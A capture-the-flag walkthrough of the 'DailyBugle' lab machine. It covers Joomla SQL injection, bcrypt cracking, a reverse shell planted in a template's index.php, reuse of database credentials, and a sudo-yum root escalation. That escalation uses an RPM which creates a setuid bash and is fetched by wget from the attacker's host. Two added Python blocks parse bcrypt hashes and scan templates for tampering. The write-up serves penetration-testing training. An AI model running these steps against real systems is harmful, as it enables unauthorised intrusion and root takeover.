DailyBugle Walkthrough

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 20:52 IST
Initiating Ping Scan at 20:52
Scanning 10.10.231.212 [2 ports]
Completed Ping Scan at 20:52, 0.37s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:52
Completed Parallel DNS resolution of 1 host. at 20:52, 0.06s elapsed
DNS resolution of 1 IPs took 0.06s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 20:52
Scanning 10.10.231.212 [3 ports]
Discovered open port 80/tcp on 10.10.231.212
Discovered open port 22/tcp on 10.10.231.212
Discovered open port 3306/tcp on 10.10.231.212
Completed Connect Scan at 20:52, 0.37s elapsed (3 total ports)
Nmap scan report for 10.10.231.212
Host is up, received syn-ack (0.37s latency).
Scanned at 2021-07-04 20:52:41 IST for 1s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
3306/tcp open  mysql   syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.86 seconds
$ nmap -sV -sC -p22,80,3306 10.10.231.212
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 20:56 IST
Nmap scan report for 10.10.231.212
Host is up (0.37s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open  mysql   MariaDB (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds

Username Enumeration - CVE-2018-15473

Input Forms

Neither form is vulnerable to SQLi.

[screenshot: homelogin]

[screenshot: forgotuserpass]

From the service scan, we know the server is running the Joomla CMS:

http-generator: Joomla! - Open Source Content Management

Let's check robots.txt for disallowed entries.

http-robots.txt: 15 disallowed entries

# If the Joomla site is installed within a folder 
# eg www.example.com/joomla/ then the robots.txt file 
# MUST be moved to the site root 
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths. 
# eg the Disallow rule for the /administrator/ folder MUST 
# be changed to read 
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://tool.motoricerca.info/robots-checker.phtml

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

Navigating to every entry in robots.txt, the only one we can access is the /administrator/ directory, which is the Joomla login page.

[screenshot: joomlalogin]

Let's run joomscan to get more information.

$ joomscan -u http://10.10.231.212

[screenshot: joomlaversion]

joomscan reports the Joomla version as 3.7.0.

Let's check for any public exploits.

Joomla 3.7.0 is vulnerable to SQLi - CVE-2017-8917.

Exploit code:

[screenshot: joomblah]

Exploiting it gives us a username and password hash:

[screenshot: joomlahash]

Extracting users from fb9j5_users
Found user ['811', 'Super User', 'jonah', '[email protected]', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']

Let's identify the hash type.

hash-identifier could not determine the hash type.

Comparing it against the hashcat example hashes shows that it is a bcrypt hash.

[screenshot: hashcathashexamples]
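The bcrypt format is easy to recognise from its structure alone: a `$2a$`/`$2b$`/`$2y$` prefix, a two-digit cost, a 22-character salt and a 31-character digest, 60 characters in all. The following parser is an added example (not part of the original walkthrough); it classifies common modular-crypt-format hashes by prefix and splits the page's bcrypt hash into its fields, deriving the 2^cost iteration count that john prints as "Cost 1". The `weak_cost` threshold and the prefix table are assumptions of the example.

```python
import re

# Modular-crypt-format prefixes commonly seen in application databases (assumed table).
PREFIX_SCHEMES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
}

# bcrypt: $<variant>$<cost>$<22-char salt><31-char digest>, using bcrypt's own base64 alphabet.
BCRYPT_RE = re.compile(r"^\$(2[aby])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

# Hash recovered from the fb9j5_users table on the page.
PAGE_HASH = "$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm"


def identify_scheme(h):
    """Return the scheme name for a modular-crypt-format string, or None if the prefix is unknown."""
    for prefix, scheme in PREFIX_SCHEMES.items():
        if h.startswith(prefix):
            return scheme
    return None


def parse_bcrypt(h):
    """Split a bcrypt hash into its fields; return None if it is not well-formed bcrypt.

    cost is the log2 work factor, so the real iteration count is 2**cost.
    """
    m = BCRYPT_RE.match(h)
    if not m:
        return None
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    return {
        "variant": variant,
        "cost": cost,
        "iterations": 2 ** cost,
        "salt": salt,
        "digest": digest,
        # Assumed threshold: PHP's password_hash() default cost is 10, so anything lower is a red flag.
        "weak_cost": cost < 10,
    }


if __name__ == "__main__":
    print(identify_scheme(PAGE_HASH))  # bcrypt
    print(parse_bcrypt(PAGE_HASH))     # cost 10 -> 1024 iterations, matching john's "Cost 1 ... 1024"
```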

Let's crack the hash:

$ john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123     (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed
$ nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.231.212
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 22:30 IST
Nmap scan report for 10.10.231.212
Host is up (0.37s latency).

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MariaDB (unauthorized)
|_mysql-empty-password: Host 'eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
| mysql-enum:
|   Accounts: No valid accounts found
|_  Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.98 seconds

Nothing much from MariaDB.

Let's log in to Joomla using the credentials obtained in the enumeration phase.

We are greeted with the control panel.

[screenshot: joomlacontrolpanel]

A quick web search shows that editing a template from the Joomla control panel can be used to obtain shell access on the server.

Navigate to Extensions > Templates > Templates in the control panel.

[screenshot: joomlatemplates]

We have two templates.

Let's find out which template Joomla is using.

[screenshot: inspect]

Joomla is using the Protostar template.

In the Protostar template, edit index.php to contain the pentest monkey reverse shell code, save it, and reload the home page.

[screenshot: prostarindex]

We got the shell.

[screenshot: shellaccess]

Spawning a TTY
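From the defender's side, the template edit above leaves an obvious trace: a stock Joomla template's index.php never opens sockets or spawns processes. The scanner below is an added example (not part of the original walkthrough) that walks a templates directory and reports PHP files calling such functions; the watch-list of function names and the constructed sample tree it scans are assumptions of the example.

```python
import os
import re
import tempfile

# PHP calls that have no legitimate place in a Joomla template (assumed watch-list).
SUSPICIOUS_CALLS = ("fsockopen", "proc_open", "popen", "exec", "shell_exec",
                    "system", "passthru", "eval")
CALL_RE = re.compile(r"\b(" + "|".join(SUSPICIOUS_CALLS) + r")\s*\(")


def scan_templates(root):
    """Report suspicious calls in every .php file under root.

    Returns a sorted list of (relative_path, line_number, function_name) tuples.
    """
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for m in CALL_RE.finditer(line):
                        findings.append((os.path.relpath(path, root), lineno, m.group(1)))
    return sorted(findings)


def make_sample_dir():
    """Build a constructed templates tree: one clean template and one tampered index.php."""
    root = tempfile.mkdtemp(prefix="joomla-templates-")
    for template in ("beez3", "protostar"):
        os.makedirs(os.path.join(root, template))
    with open(os.path.join(root, "beez3", "index.php"), "w") as fh:
        fh.write("<?php\ndefined('_JEXEC') or die;\n$app = JFactory::getApplication();\n")
    with open(os.path.join(root, "protostar", "index.php"), "w") as fh:
        # Constructed marker only: a socket open, which a template never needs.
        fh.write("<?php\ndefined('_JEXEC') or die;\n$sock = fsockopen('198.51.100.1', 9898);\n")
    return root


if __name__ == "__main__":
    for rel, lineno, func in scan_templates(make_sample_dir()):
        print(f"{rel}:{lineno}: suspicious call {func}()")  # protostar/index.php:3: fsockopen()
```

On a real install the same function would be pointed at /var/www/html/templates, and any hit on a stock template is worth comparing against a clean copy of that Joomla release.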

sh-4.2$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.2$ ^Z
[1]  + 5783 suspended  nc -nlvp 9898

$ stty raw -echo; fg       
[1]  + 5783 continued  nc -nlvp 9898
bash-4.2$ export TERM=xterm
bash-4.2$ 

We don't have access to jjameson's home directory, so we can't read the user flag yet.

bash-4.2$ ls -l /home
total 0
drwx------. 2 jjameson jjameson 99 Dec 15  2019 jjameson

This web server uses a MariaDB database, and PHP needs a configuration file in the web directory to connect to it, so let's check that file.

bash-4.2$ cd /var/www/html
bash-4.2$ ls
LICENSE.txt    cli                includes   media       tmp
README.txt     components         index.php  modules     web.config.txt
administrator  configuration.php  language   plugins
bin            htaccess.txt       layouts    robots.txt
cache          images             libraries  templates
bash-4.2$ cat configuration.php
<?php
class JConfig {
        public $offline = '0';
        public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
        public $display_offline_message = '1';
        public $offline_image = '';
        public $sitename = 'The Daily Bugle';
        public $editor = 'tinymce';
        public $captcha = '0';
        public $list_limit = '20';
        public $access = '1';
        public $debug = '0';
        public $debug_lang = '0';
        public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'root';
        public $password = 'nv5uz9r3ZEDzVjNu';
        public $db = 'joomla';
        public $dbprefix = 'fb9j5_';
        public $live_site = '';
        public $secret = 'UAMBRWzHO3oFPmVC';
        public $gzip = '0';
[...snip...]

Using the obtained database credentials, let's log in to the DB and look for any juicy details.

bash-4.2$ mysql -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 305
Server version: 5.5.64-MariaDB MariaDB Server

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databaes;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'databaes' at line 1
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| mysql              |
| performance_schema |
| test               |
+--------------------+
5 rows in set (0.00 sec)

MariaDB [(none)]> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| fb9j5_assets                  |
| fb9j5_associations            |
| fb9j5_banner_clients          |
| fb9j5_banner_tracks           |
| fb9j5_banners                 |
[...snip...]

No juicy information obtained.

Let's try the same database password against the users on the target machine.

[screenshot: userflag]

We got access as jjameson and the user flag.

Let's check for PrivEsc possibilities.

There is a sudo permission for the yum binary.

[screenshot: sudoprivesc]

Using information from GTFOBins and the fpm tool to escalate privileges:

$ git clone https://github.com/jordansissel/fpm.git
$ cd fpm
$ sudo gem install fpm
$ sudo apt-get install rpm
$ printf '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod +s /tmp/bash' > root.sh
$ ls
bin                 CONTRIBUTORS  fpm.gemspec  Makefile           README.rst       templates
Brewfile            Dockerfile    Gemfile      misc               root.sh          test
CHANGELOG.rst       docs          lib          NOTES.md           singularity.def  Vagrantfile
CODE_OF_CONDUCT.md  examples      LICENSE      notify-failure.sh  spec
$ mkdir junk
# -n is the package name, -s the input type, -t the output package type, -a the architecture
$ fpm -n tmpbash -s dir -t rpm -a all --before-install ./root.sh ./junk
Created package {:path=>"tmpbash-1.0-1.noarch.rpm"}
$ ls
bin                 Dockerfile   junk      NOTES.md           spec
Brewfile            docs         lib       notify-failure.sh  templates
CHANGELOG.rst       examples     LICENSE   README.rst         test
CODE_OF_CONDUCT.md  fpm.gemspec  Makefile  root.sh            tmpbash-1.0-1.noarch.rpm
CONTRIBUTORS        Gemfile      misc      singularity.def    Vagrantfile 
$ python3 -m http.server 8991              
Serving HTTP on 0.0.0.0 port 8991 (http://0.0.0.0:8991/) ...

Getting the root flag

wget http://<ip>:8991/tmpbash-1.0-1.noarch.rpm

[screenshot: root.txt]